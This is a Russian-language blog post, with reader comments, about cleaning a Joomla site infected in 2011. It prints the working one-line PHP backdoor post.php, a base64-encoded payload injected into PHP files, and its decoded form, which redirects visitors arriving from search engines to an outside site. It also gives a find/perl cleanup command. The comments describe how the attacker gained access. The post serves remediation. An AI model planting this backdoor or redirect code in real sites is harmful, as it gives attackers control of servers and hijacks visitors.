В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор - файл post.php, следующего содержания
<?php eval(base64_decode($_POST["php"])); ?>
После чего основная масса файлов с расширением php (причем, заражалось все без разбору, включая configuration.php.
Код, который помещался в файл таков:
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));
Это зашифрованная в base64 информация, которая содержит в себе ссылку на какой-то польский сайт
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://happynewyear.osa.pl/");
exit();
}
}
}
}
Чтобы аккуратно очистить зараженный сайт, следут авторизоваться по ssh и выполнить следующую простую команду
find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*p9\"\)\)\;//g' '{}' \;
После всего этого остается только напомнить, что следует постоянно следить за актуальностью версий программного обеспечения, которое используется на сайте.
Так же обратите внимание на выход Joomla! 2.5, которая станет LTS и достойной заменой Joomla! 1.5.
PS: Если возникнут проблемы с удалением вредоносного кода, то всегда готов помочь.
Здраствуйте, мое имя Вадим Сабынич. Я немного езжу на велосипеде, немного играю на гитаре и барабанах, немного пишу о юниксах, немного перевожу с английского на русский, немного читаю книги, немного аграрничаю на даче, немного фотографирую, делаю понемногу еще кучу разных вещей =)
Со мной можно связаться следующими способами:
e-mail: vadim@sabini.ch
JID: vadim@sabini.ch
Бьюсь с такой проблемой уже 4 неделю
Сам столкнулся с такой проблемой и никак не могу ее решить. Суть такова висит сайт в топе, как я понимаю на него идет атака, чтоб с яндекса по ссылке редиректится на указанный в коде сайт. Сайты, кстати всегда разные. Если заходить напрямую на сайт то редирект не происходит. Сайтов на хосте много, поэтому делаю просто общее восстановление сайтов на день предыдущий, помогает на 3-4 дня, после этого снова все php файлы с кодом. Дыру так и не могу найти, тех поддержка тоже внятного ничего сказать не может. Закрывал доступ по фтп, не спасло. Вобщем беда, спасает только бэкапы. Джумка везде обновлена до последнего релиза 1.5.25.
Видел подобное. Посмотри в
Видел подобное. Посмотри в .htaccess, который лежит как в корне сайта, так и в директории выше уровнем.
Можешь прислать на е-мейл реквизиты доступа по shh - гляну сам.
Нашел я файлы зловреда
После очередного взлома, перелопатил все сайты на хостинге, в .htaccess ничего подозрительного не нашел. Но как вы и писали, в каталоге images нашел post.php, примечательно что в папке темы я нашел еще один интересный файл w2.php который собственно и содержит сам код. Файлик я могу выслать вам на почту, ясли интересно - гляните, я не особо разбираюсь в php программировании но, похоже там много интересного.
в Joomla была некая уязвимость
Не знаю что там было а что нет, а может и сейчас ещё есть, но все пишут одну и ту же глупость: "позволила злоумышленникам положить в директорию images бекдор - файл post.php".
Да всё очень просто - пароль он к админке подбирает, заходит в настройки сайта, дописывает в разрешённые для загрузки файлы расширение .php и спокойно загружает свой post.php в картинки.
Реально жесть, все пишите, панацею даёте, а у самих до сих пор поди загрузка файлов .php разрешена после него. И кэширование он ещё включает напоследок)))
есть 2 ссылки
Добрый деь
Похожая проблема. Сайт еще на локал хосте.
В коде есть 2 ссылки на внешние сайты (смартфоны), не могу их найти.
Искал через БД, Файл менеджер, вручную просматривал. Как понимаю, там кодировка другая стоит.
Помогите, где и чем искать??
Подозреваю, что они
Подозреваю, что они зашифрованы в base64.
А как же, а как же?
как выявить такой шифр, чем искать?
поиском по телу файлов.можно
поиском по телу файлов.
можно с помощью find, grep, если в unix-like системах
результат будет
Искал с помощью Total Commander, находит около 100 файлов. все нужно перелопатить, ведь ссылки скорее всего в коде самой джумлы или расширениях (докачивал шаблон, языки, сайтмап, меню)
В любом случае СПАСИБО!
Будем разбираться)
Добавить комментарий